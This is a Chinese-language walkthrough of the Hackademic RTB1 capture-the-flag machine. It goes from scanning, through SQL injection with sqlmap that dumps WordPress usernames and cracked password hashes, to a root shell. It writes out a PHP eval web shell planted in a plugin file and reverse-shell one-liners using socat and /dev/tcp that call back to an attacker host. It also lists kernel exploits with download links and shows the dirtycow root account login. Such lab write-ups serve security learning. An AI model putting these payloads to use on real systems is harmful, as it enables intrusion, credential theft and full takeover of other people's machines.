免责申明:本人所撰写的文章,仅供学习和研究使用,请勿使用文中的技术或源码用于非法用途,任何人造成的任何负面影响,或触犯法律,与本人无关
nmap -sC -sV -p- -oA hackademis 10.7.3.4
nmap -p- 10.7.3.4
- 尝试直接访问 http://10.7.3.4
- 点击几个页面使用 ' and 1=1 and 1=2 判断是否存在注入漏洞,经过确认是存在SQL注入漏洞
- http://10.7.3.4/Hackademic_RTB1/?cat=1
- 直接使用sqlmap进行注入
- sqlmap -u "http://10.7.3.4/Hackademic_RTB1/?cat=1"
- sqlmap 跑的过程中 出现这个参数 --union-char
- 原因如下:
默认情况下sqlmap针对UNION查询的注入会使用NULL字符,但是有些情况下会造成页面返回失败,而一个随机整数是成功的,这个时候可以用--union-char只定UNION查询的字符
- sqlmap跑出来的结果如下
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
Database: wordpress
[9 tables]
+-------------------+
| wp_categories |
| wp_comments |
| wp_linkcategories |
| wp_links |
| wp_options |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_users |
+-------------------+
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
[6 entries]
+-------------------------+
| user_email |
+-------------------------+
| GeorgeMiller@hacked.com |
| JasonKonnors@hacked.com |
| JohnSmith@hacked |
| MaxBucky@hacked.com |
| NickJames@hacked.com |
| TonyBlack@hacked.com |
+-------------------------+
[6 entries]
+--------------+---------------------------------------------+
| user_login | user_pass |
+--------------+---------------------------------------------+
| NickJames | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 (kernel) |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 (napoleon) |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c |
+--------------+---------------------------------------------+
* NickJames quanxian bijiaoda
* MaxBucky jiebn meiyou quanxian
* GeorgeMiller quanxian heng da
* JasonKonnors jiben meiyou quanxian
* TonyBlack jiben meiyou quanxian
- 尝试开始暴力破解目录
- python3 dirsearch.py -u http://10.7.3.4/Hackademic_RTB1/ -w /usr/share/dirb/wordlists/big.txt -e php
python3 dirsearch.py -u http://10.7.3.4/Hackademic_RTB1/ -w /usr/share/dirb/wordlists/big.txt -e php
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 20469
Error Log: /usr/local/dirsearch/logs/errors-19-11-25_17-41-40.log
Target: http://10.7.3.4/Hackademic_RTB1/
[17:41:40] Starting:
[17:51:31] 301 - 329B - /Hackademic_RTB1/wp-admin -> http://10.7.3.4/Hackademic_RTB1/wp-admin/
[17:51:31] 301 - 331B - /Hackademic_RTB1/wp-content -> http://10.7.3.4/Hackademic_RTB1/wp-content/
[17:51:31] 301 - 330B - /Hackademic_RTB1/wp-images -> http://10.7.3.4/Hackademic_RTB1/wp-images/
[17:51:31] 301 - 332B - /Hackademic_RTB1/wp-includes -> http://10.7.3.4/Hackademic_RTB1/wp-includes/
Task Completed
通过直接编辑里面的文件textile1.php可以直接将代码改成下面的一句话小马
然后是中国蚁剑进行连接,当然也有其他方式反弹shell
<?php eval($_POST['tdhkone']); ?>
http://10.7.3.4/Hackademic_RTB1/wp-content/plugins/textile1.php
由于老版系统没有socat命令不能反弹tty shell
socat file:
tty,raw,echo=0 tcp-listen:9988socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.7.3.5:9988
使用python2搭建简易脚本,然后下载提权收集信息脚本和利用漏洞本地溢出提权建议脚本
python -m SimpleHTTPServer 8082
通过下面方法执行反弹shell到本机的kali
使用nc的方式,发现nc被阉割了,缺少-e -c参数
/bin/bash -i > /dev/tcp/10.7.3.5/4488 0<&1 2>&1
kali上本地监听 nc -lvnp 4488
然后执行 ./linux-exploit-suggester.sh
执行结果如下:
./linux-exploit-suggester.sh
Available information:
Kernel version: 2.6.31.5
Architecture: i386
Distribution: fedora
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
72 kernel space exploits
42 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2018-14665] raptor_xorgy
Details: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
Exposure: less probable
Tags: centos=7.4
Download URL: https://www.exploit-db.com/download/45922
Comments: X.Org Server before 1.20.3 is vulnerable. Distros use own versioning scheme. Manual verification needed.
[+] [CVE-2018-10900] vpnc_privesc.py
Details: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Exposure: less probable
Tags: ubuntu=16.04{network-manager-vpnc:1.1.93-1},debian=9.0{network-manager-vpnc:1.2.4-4},manjaro=17
Download URL: https://bugzilla.novell.com/attachment.cgi?id=779110
Comments: Distros use own versioning scheme. Manual verification needed.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000367] sudopwn
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Download URL: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000367] Sudoer-to-root
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Tags: RHEL=7{sudo:1.8.6p7}
Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2016-4989] setroubleshoot 2
Details: https://c-skills.blogspot.com/2016/06/lets-feed-attacker-input-to-sh-c-to-see.html
Exposure: less probable
Tags: RHEL=6|7
Download URL: https://github.com/stealth/troubleshooter/raw/master/straight-shooter.c
[+] [CVE-2015-5287] abrt/sosreport-rhel7
Details: https://www.openwall.com/lists/oss-security/2015/12/01/1
Exposure: less probable
Tags: RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
[+] [CVE-2015-3315] raceabrt
Details: http://seclists.org/oss-sec/2015/q2/130
Exposure: less probable
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
[+] [CVE-2015-3246] userhelper
Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
Exposure: less probable
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Download URL: https://www.exploit-db.com/download/37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Exposure: less probable
Tags: debian=7.0|8.0,ubuntu=*
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2015-1862] newpid (abrt)
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Exposure: less probable
Tags: fedora=20
Download URL: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
[+] [CVE-2015-1815] setroubleshoot
Details: https://www.exploit-db.com/exploits/36564/
Exposure: less probable
Tags: fedora=21
Download URL: https://www.exploit-db.com/download/36564
[+] [CVE-2014-5119] __gconv_translit_find
Details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: less probable
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: less probable
Tags: ubuntu=10.04
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: less probable
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-1146] reiserfs
Details: https://www.exploit-db.com/exploits/12130/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://www.exploit-db.com/download/12130
bash-4.0$ su - firefart
Password: redhat
[firefart@HackademicRTB1 ~]# ls
anaconda-ks.cfg Desktop key.txt key.txt~
[firefart@HackademicRTB1 ~]# id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@HackademicRTB1 ~]# ls
anaconda-ks.cfg Desktop key.txt key.txt~
[firefart@HackademicRTB1 ~]# cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
[firefart@HackademicRTB1 ~]#
